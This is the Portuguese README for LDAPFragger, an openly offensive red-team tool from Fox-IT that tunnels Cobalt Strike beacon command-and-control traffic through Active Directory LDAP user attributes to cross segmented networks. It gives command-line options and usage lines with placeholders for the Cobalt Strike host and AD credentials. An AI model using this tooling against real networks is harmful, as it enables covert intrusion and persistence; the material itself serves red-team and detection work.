
Ferramenta C2 que roteia dados do beacon do Cobalt Strike através de atributos de usuário LDAP para comando e controle furtivo em redes segmentadas.
LDAPFragger é uma ferramenta de Comando e Controle que permite que atacantes roteiem dados de beacon do Cobalt Strike sobre LDAP usando atributos de usuário.
Para informações de contexto, leia o blog do lançamento: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0, mas pode funcionar com versões mais antigas e mais novas do .NET também _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Usage:
--cshost: Endereço IP ou hostname da instância do Cobalt Strike
--csport: Porta da interface C2 externa no servidor Cobalt Strike
-u: Nome de usuário para conectar ao Active Directory
-p: Senha para conectar ao Active Directory
-d: FQDN do domínio Active Directory
--ldaps: Usar LDAPS em vez de LDAP
-v: Saída detalhada
-h: Exibir esta mensagem
Se nenhuma credencial de AD for fornecida, a autenticação integrada do AD será usada.
Exemplo de uso:

Do segmento de rede A, execute
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
Do segmento de rede B, execute
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS pode ser usado com a flag --LDAPS, no entanto, o tráfego LDAP normal também é criptografado. Observe que o payload padrão do Cobalt Strike será detectado pela maioria dos antivírus.